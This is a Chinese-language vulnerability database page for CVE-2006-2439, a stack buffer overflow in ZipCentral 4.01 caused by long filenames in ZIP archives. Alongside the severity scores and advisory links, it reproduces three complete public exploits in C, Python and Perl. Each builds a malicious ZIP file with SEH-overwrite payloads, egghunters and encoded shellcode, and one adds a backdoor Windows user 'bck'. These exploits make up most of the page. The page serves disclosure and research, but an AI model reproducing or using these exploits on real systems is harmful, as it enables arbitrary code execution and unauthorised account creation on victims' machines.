CVE-2006-2439
CVSS7.6
发布时间 :2006-06-01 06:02:00
修订时间 :2011-07-28 00:00:00
NMCOE    

[原文]Stack-based buffer overflow in ZipCentral 4.01 allows remote user-assisted attackers to execute arbitrary code via a ZIP archive containing a long filename.


[CNNVD]ZipCentral ZIP文件解压 栈溢出漏洞(CNNVD-200606-017)

        ZipCentral是一款免费的文件压缩/解压工具。
        ZipCentral在处理ZIP文档的文件名时存在栈溢出漏洞,用户在解压有超长文件名的恶意ZIP文档时就会触发这个漏洞,导致执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2439
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2439
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-017
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/26737
(UNKNOWN)  XF  zipcentral-zip-filename-bo(26737)
http://www.vupen.com/english/advisories/2006/2049
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2049
http://www.securityfocus.com/bid/18160
(UNKNOWN)  BID  18160
http://www.securityfocus.com/archive/1/archive/1/435416/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060531 Secunia Research: ZipCentral ZIP File Handling Buffer OverflowVulnerability
http://www.osvdb.org/25830
(UNKNOWN)  OSVDB  25830
http://securitytracker.com/id?1016176
(UNKNOWN)  SECTRACK  1016176
http://secunia.com/secunia_research/2006-35/advisory/
(VENDOR_ADVISORY)  MISC  http://secunia.com/secunia_research/2006-35/advisory/
http://secunia.com/advisories/20179
(VENDOR_ADVISORY)  SECUNIA  20179

- 漏洞信息

ZipCentral ZIP文件解压 栈溢出漏洞
高危 缓冲区溢出
2006-06-01 00:00:00 2007-09-27 00:00:00
远程  
        ZipCentral是一款免费的文件压缩/解压工具。
        ZipCentral在处理ZIP文档的文件名时存在栈溢出漏洞,用户在解压有超长文件名的恶意ZIP文档时就会触发这个漏洞,导致执行任意指令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://hemsidor.torget.se/users/z/zcentral/products.html

- 漏洞信息 (2278)

ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit (EDBID:2278)
windows local
2006-08-30 Verified
0 bratax
[点击下载] [点击下载]
/*
ZipCentral 4.01 Exploit by bratax (http://www.bratax.be/)

Soooooo many thanks to BuzzDee and c0rrupt for helping me with all the
problems I encountered :) Wouldn't have finished this without you guys!

Greetz to everyone I like... (no, that doesn't include you turb00)!

******************************

Some technical info:
- vulnerability is available here:
  http://secunia.com/secunia_research/2006-35/advisory
- using SEH to exploit this
- some code might look weird in this source.. (e.g. shellcode, offsets,...)
  this is because a lot of values are changed in memory.. so use your favorite
  debugger to see the real values and codes
- shellcode adds a windows user "bck" with password "bck" (thx metasploit)
- tested on XP Pro English (SP2) and XP Home Dutch (SP2)

*/

#include <stdio.h>
#include <string.h>

unsigned char scode[] =
"\x89\x03\x59\x89\x05\x8a\x9b\x98\x98\x98\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x57"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x58"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x38"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x44"
"\x4b\x38\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x38\x4e\x51\x4b\x58"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x57"
"\x4e\x50\x4b\x58\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x56\x4d\x56"
"\x46\x46\x50\x42\x45\x46\x4a\x57\x45\x56\x42\x52\x4f\x42\x43\x36"
"\x42\x52\x50\x46\x45\x56\x46\x57\x42\x52\x45\x57\x43\x47\x45\x36"
"\x44\x47\x42\x42\x44\x46\x43\x56\x4b\x36\x42\x42\x44\x56\x43\x56"
"\x4b\x46\x42\x52\x4f\x42\x41\x34\x46\x44\x46\x34\x42\x32\x48\x42"
"\x48\x32\x42\x32\x50\x56\x45\x46\x46\x57\x42\x52\x4e\x36\x4f\x36"
"\x43\x46\x41\x56\x4e\x56\x47\x36\x44\x37\x4f\x46\x45\x37\x42\x37"
"\x42\x52\x41\x54\x46\x56\x4d\x36\x49\x36\x50\x36\x49\x56\x43\x37"
"\x46\x57\x44\x47\x41\x56\x46\x37\x4f\x56\x44\x47\x43\x57\x42\x52"
"\x44\x56\x43\x46\x4b\x46\x42\x32\x4f\x52\x41\x54\x46\x34\x46\x44"
"\x42\x30\x5a";

char head[] = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00"
			 "\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00"
			 "\x00\x00\x00\x00\x00\x00\x14\x08\x00";
char middle[] = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00"
				"\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34"
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
				"\x00\x00\x14\x08\x00\x00\x00\x00\x00\x00"
				"\x01\x00\x24\x00\x00\x00\x00\x00\x00";
char tail[] = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00"
			 "\x00\x00\x01\x00\x01\x00\x42\x08\x00\x00"
			 "\x32\x08\x00\x00\x00";

int main(int argc,char *argv[])
{
	char overflow[657]; // is 657 bytes big enough for a filename?
	char overflow2[1407];
FILE *vuln;
if(argc == 1)
{
    printf("ZipCentral 4.01 Buffer Overflow Exploit.\n");
    printf("Coded by bratax (http://www.bratax.be/).\n");
    printf("Usage: %s <outputfile>\n",argv[0]);
    return 0;
}
vuln = fopen(argv[1],"w");

//build overflow buffer here.
memset(overflow,0x41,sizeof(overflow)); //fill with crap
memcpy(overflow+2, scode, 483); // our shellcode
memcpy(overflow+653, "\x82\x6E\xEC\x98", 4); // jmp back to shellcode
memset(overflow2, 0x42, sizeof(overflow2)); // more crap
memcpy(overflow2+0,"\x98\x85\x8E\x00", 4); // pop pop ret
// pop pop ret somewhere within 0x00xxxxFF.. needed because of 2 reasons
// which I'm not going to explain here right now..
// notice that 008E8598 will be changed in memory and will become 00C4E0FF
// this might be different on other machines, but will always be 00xxE0FF


if(vuln)
{
    //Write file
    fwrite(head, 1, sizeof(head), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(overflow2, 1, sizeof(overflow2), vuln);
    fwrite(middle, 1, sizeof(middle), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(overflow2, 1, sizeof(overflow2), vuln);
    fwrite(tail, 1, sizeof(tail), vuln);
    fclose(vuln);
}
printf("File written.\nOpen with ZipCentral 4.01 to exploit.\n");
return 0;
}

// milw0rm.com [2006-08-30]
		

- 漏洞信息 (12053)

ZipCentral (.zip) SEH Exploit (EDBID:12053)
windows local
2010-04-04 Verified
0 TecR0c
[点击下载] [点击下载]
#!/usr/bin/python
#
# Title:                ZipCentral (.zip) SEH exploit
# Author:               TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
# Download:             http://downloads.pcworld.com/pub/new/utilities/compression/zcsetup.exe
# Platform:             Windows XP sp3 En (VMWARE)
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Unfortunately, no one can be told what the Matrix is. You have to see it for yourself!
# To be able to make sure your hex values get mangled correctly i have created my own
# Mangled Chart: http://tecninja.net/blog/?p=35
# Discription of exploit: http://tecninja.net/blog/?p=73
# You can notice i have used this technique for my PPR and JMPs

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] pill (.zip) SEH exploit - by TecR0c"



ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00")

cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")

eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"
"\x02\x10\x00\x00"
"\x00\x00")


#Limit of 50 bytes for the filename

#PASSWORDS
#filename = ("\x50\x41\x53"
#"\x53\x57\xea\x52\x44\x53")

#ReadMe
filename = (
"\x52\x65\x61\x64\x4d\x65")


# ESI - Im going to enjoy watching you die Mr Anderson
egghunter = ("VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIBFmQzjk"
"OdOw2sb3ZUR68JmVNulUUQJSDJOx867Dpdp64nkKJNOpuKZNOT5JGYokWA")

# align ESI for msg - To deny our own impulses is to deny the very thing that makes us human
getpc = ("\x89\x05\x5e\x41\x98\x99\x41\x8a\x94\x98\x98\x98")

# EDI is chosen thanks to the egghunter - Never send a human to do a machines job
msg = ( # TITLE=Corelan TEXT="You have been pwned"
"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkOkJy4"
"4a4yd4qXRlr2Zp1HIpdNk2Q00lK2VVllKpvglnkg6THNksNUpLKVVWHPOfxRU"
"l3ryUQKakOXa50nkPlvDtdLKW5wLlKPTTEPxWqKZLK0J6xnk1JwPVahkM35g1"
"YlK7DLKVaXn6Q9o6QkpKLnLMTIP0tTJKq8O4Ms1iWm9hqyo9okOWKQlwTWXae"
"knnk0ZUtGqzK1vNk6l0KLKPZuLs1jKLK4Dnkc1m8NiQTwT7lu1O3oBTHGYn4O"
"y8eLIKrqxnnPNVnZL3bkXmLKOkOKOK9pETDOKqnKhM2qcmW5Lddcbm8NkKOIo"
"KOoyqU4H3XRLrLGPkOu8tsvR6NQte8QeQc0esBoxQLetwzOyKVF6Yo65vdmY9"
"RrpmklhoRPMmlowglut2rM8CnKOKO9oQxRLparNqH1xrcPobR2EEaKkmXQLTd"
"UWMY9saxBNsUu4shu8RNq0RPqgRHq0QrBE3UU80h3QPvQu58QIBOd5upvQO9m"
"XpLutvsK9YqfQN22r63SaaBio8PVQyPpP9oPUS8vjA")


buff = filename
buff += "\x20" * (50-len(buff))
buff += "\x57\x30\x30\x54" # If you close your eyes, it almost feels like you're eating runny eggs
buff += "\x57\x30\x30\x54" # The trace was completed
buff += msg # Don't hate me Trinity... I'm just the messenger
buff += "\x41" * (653-len(buff))
buff += "\x89\x06\x42\x42"
buff += "\x56\x29\xa5\x72" # Welcome to the desert of the real
buff += "\x41" * 10
buff += getpc
buff += egghunter # The digital pimp hard at work
buff += "\x42" * (4064-len(buff))
buff += ".txt"


mefile = open('pill.zip','w');
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);
mefile.close()
		

- 漏洞信息 (14433)

ZipCentral (.zip) Buffer Overflow (SEH) (EDBID:14433)
windows local
2010-07-21 Verified
0 Jiten Pathy
[点击下载] [点击下载]
# Author : Jiten Pathy
# July 21 2010


#Thanks to the http://en.wikipedia.org/wiki/PKZIP page for heelping me understand zip file format
#Thanks to corelanc0d3r for shredding light on these type of exploits at http://www.offensive-security.com/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/
# Greetz to SSTeam and G4H members

#There is already a exploit on zipcentral filename handling buffer #overflow over 2 months ago which uses an address from a system dll for #SEH which isnt reliable across different platforms so this one uses an #address from exe file which is a little complicated but reliable

my $filename="pwnzipcentral.zip";

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .# file size
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f". # file size
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00". # Size of central directory (bytes)
"\x02\x10\x00\x00". # Offset of start of central directory,
                    # relative to start of archive
"\x00\x00";

my $egghunter="hffffk4diFkDrj02Drk0D2AuEE2C4s4I8K1L0v7K0R0I0i4A7N0J022q0D5M".
"4H7n100Y1p3Z8M3q0E305o0G3E4N3G0D";
#ascii mixed case egghunter with EDX as basereg

my $junk="A"x(653-length($egghunter)-102);

#Here is a different approach prior to make EDX to point at our #egghunter.
#push ebp,pop edx puts ebp into edx and then we add edx with right value.
#Here We encode 
#add edx,087f
#jmp edx ;with custom decoder (muts) which should evntually execute these #two instructions which should be produced in stack after the decoder.SO #we need to prepare esp for this .But i found that instruction "pop esp"('\') breaks the shellcode (not so lucky for this application).
#So we cant just pop things from top of stack to point esp and we cant use #too many "popa" or "pop r" here due to limited space. 
#So what we do here is inc esp using loop which will make esp point #somewhere after the decoder .So i did some lulz math found out how much #increment i need(0xb16) and did 2 loops(in hex 42*2b=b16;both are #alphanumeric) and we get the desired value in esp.There is always way to #make our way theough. 

my $preparegg="\x6a\x42". #push 42h
"\x58".                    #pop eax
"\x6a\x2b".                #push 2bh
"\x59".                   #pop ecx
"C"x5 .                   #fillers for our loop Here is where inner loop #will jump
"\x44".                   #inc esp
"\x48".                   #dec eax
"\x75\xf6".               #converted \x75\xf7 not much difference lol #which is jnz -9
"\x34\x42".               #xor al,42
"\x49".                   #dec ecx
"\x75\xf6".               #again jnz -9 but this one will jump somewher in 
#the fillers but all we care is about inc esp getting executed
"\x55".                   #push ebp
"\x5a".                   #pop edx
"\x25\x4A\x4D\x4E\x4a".   
"\x25\x35\x32\x31\x35".   #zero eax
"\x2d\x52\x55\x62\x43".
"\x2d\x52\x55\x66\x44".
"\x2d\x54\x56\x54\x36".   #\x08\xff\xe2\x41
"\x50".
"\x25\x4A\x4D\x4E\x4a".   
"\x25\x35\x32\x31\x35".   #zero eax
"\x2d\x33\x2b\x69\x2e".
"\x2d\x33\x2b\x69\x28".
"\x2d\x34\x28\x6b\x29".   #\x66\x81\xc2\x7f
"\x50";

my $fill="A"x(102-length($preparegg));#more nops

my $nseh="\x74\xf7\x41\x41";#becomes 74 98 41 41 jumping 102 bytes back

my $seh="\x41\x6c\x42\x00";#ascii compatible ppr address

#alpha mixedcase messagebox shellcode with EDI as basereg(since egghunter #has already EDI as address of our shellcode )
my $shell="hffffk4diFkDwj02Dwk0D7AuEE4n0b7n1132165L5m403i7l003d8K4G1p5k0l3c".
"0S3r0X0P018M4x191p0J3Y8L0t0P044S5K2A2G2J3C1N4x0F4x0Y8N3J0l2u2p353o4G8N3".
"V2j2D2t0n0F4p4s2q2t0u8K0a3r0R5O0G1N3P0o1m035L4y0V300B3Z3W0h1l7p2G3g3i3d".
"363G4q8L2n114l0V3n0r1p4x0u7o3t0t1k4s7n2s3u2J4B5O5K8M4K4q4T4A5K068o1p0z4".
"y0A5K4D3I4P3W4t8O3z0K0z0V2Z2Z004p032u0O0L08022l365K3H0D3Z4s8K403z001k7m".
"0O3R0G1N022H0X4T4T4J1p4X0P4x8L4X1P7k1k181o0I0L2A4u157L0N0M2q0Y12160B0T7".
"n0F7M0U100e4O1P1l2D7M0X2w0r2k4p102u0h0K7K0V190W011k080W090G2v0e4p0a0o2x".
"1L3m2C1k190K2K0R3X0y0o021n0Y180T2r0X070Q2j0C3X8P2C1k031p065L7L2w0T1l2C0".
"Q2A0W2r2p121n0Z0X051m7n0W020X0U0X7L0X0V0W0U0c2G1l0l0v0J0X2r1L2y1o1n1l09".
"1p7l0X190J0z0r3j3K2z0a0c0b4E3p0X0T2x0D2r4p7k2w0Q0O2O0a7l1o0Q0Z2m0H011p1".
"00c4k1P0n0Q0A3m198O5p04";  

my $payload=$egghunter.$junk.$preparegg.$fill.$nseh.$seh."w00tw00t".$shell;

my $more="D" x (4064-length($payload));

$payload = $payload.$more.".txt";

print "Size : " . length($payload)."\n";
print "Removing old $filename file\n";
system("del $filename");
print "Creating new $filename file\n";
open(FILE, ">$filename");
print FILE $ldf_header.$payload.$cdf_header.$payload.$eofcdf_header;
close(FILE);
print "\m/ Your exploit is ready.\n";
#That popped a messagebox with message "My First Null free Shellcode In Windows"(indeed it was).All you need is a bit of quick math and keep looking for possibilities.
#Hope someone learned something from this re-exploit.		

- 漏洞信息

25830
ZipCentral ZIP File Archive Filename Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Third-party Verified

- 漏洞描述

A remote overflow exists in ZipCentral. The product fails to perform boundary checks on filenames in zip archives resulting in a stack-based overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-05-30 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站